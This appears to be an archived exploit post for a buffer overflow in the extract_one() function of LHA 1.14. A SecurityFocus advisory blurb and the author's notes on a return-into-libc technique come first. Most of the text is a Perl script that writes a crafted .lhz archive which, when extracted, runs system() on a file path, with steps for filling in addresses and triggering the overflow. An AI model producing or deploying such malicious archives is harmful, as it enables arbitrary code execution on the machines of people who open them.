LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities



source: http://www.securityfocus.com/bid/10354/info


LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. These issues are triggered in the 'extract_one()' and are due to a failure of the application to properly validate string lengths in offending files.

These issues might allow an attacker to execute code in the context of a user invoking the affected utility.

Exploiting lha-1.14 (after security advisories)
19 May, 2004
Copyright (2004) Lukasz Wojtow <lw@wszia.edu.pl>

At the time of writing this text, some vulnerabilities have been discovered
and fixed, but not all (i've sent info to major linux distributions and 
Bugtraq, but they didn't seem to bother).
This code creates an archive, which decompressed with lha-1.14
will cause a buffer overflow. The bug is in function extract_one (there are a 
lot of bugs, actually). At first it looked like like a typical stack overflow,
but after a couple of thoughts it was obvious that returnig on the stack was 
impossible (due to special 0xff handling). The only option came to my mind 
was return-into-libc.
Addresses inside this code do system("/tmp/lhXXXXXX") and exit().
Before exploiting 3 addresses have to be obtained:
- system function,
- exit function (not really needed, but SEGFAULT could be noticed),
- address of /tmp/lhXXXXXX inside exploitet binary.
Put these addresses into their place in the code (in little endian order 
on x86) and run:
./code > archive.lhz

then command
lha -e archive.lhz 
will cause execution of /tmp/lhXXXXXX
Enjoy

---CODE START---

#!/usr/bin/perl
my $exit_addr= "\x50\xf2\x4\x40";
my $system_addr= "\x30\x65\x6\x40";
my $tmp_string= "\xfa\x1e\x5\x8";

print    "\x19\x8d\x2d\x6c\x68\x64\x2d\x18\x0\x0\x0\x0\x0\x0\x0\xe1\xa5".
    "\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0".
    "\x0\x0\x5\x0\x2\x46\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xde".
    "\x2d\x6c\x68\x64\x2d\x69\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20".
    "\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\x56\x0\x2".
    "\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x2f\x2d\x6c\x68".
    "\x64\x2d\xba\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0".
    "\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xa7\x0\x2\x46\xff\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x81\x2d\x6c\x68\x64\x2d".
    "\xb\x1\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0".
    "\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xf8\x0\x2\x46\xff\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff".
    "\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xff\x2d\x6c\x68\x64\x2d\x48".
    "\x1\x0\x0\x0\x0\x0\x0\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50".
    "\xed\x41\x7\x0\x51\x0\x0\x0\x0\x35\x1\x2\x46\xff\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x7\x0\x54\xaf\x68".
    "\xaa\x40\x0\x0\x19\x10\x2d\x6c\x68\x64\x2d\x59\x1\x0\x0\x0\x0\x0\x0".
    "\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0".
    "\x0\x0\x0\x46\x1\x2\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
    "\x41\x41\x41\x41\xff\x41\x41\x41\x41".
    $system_addr.  $exit_addr.  $tmp_string.
    "\xff\x7\x0\x54\xaf\x68\xaa\x40\x0\x0\x0";

---CODE END---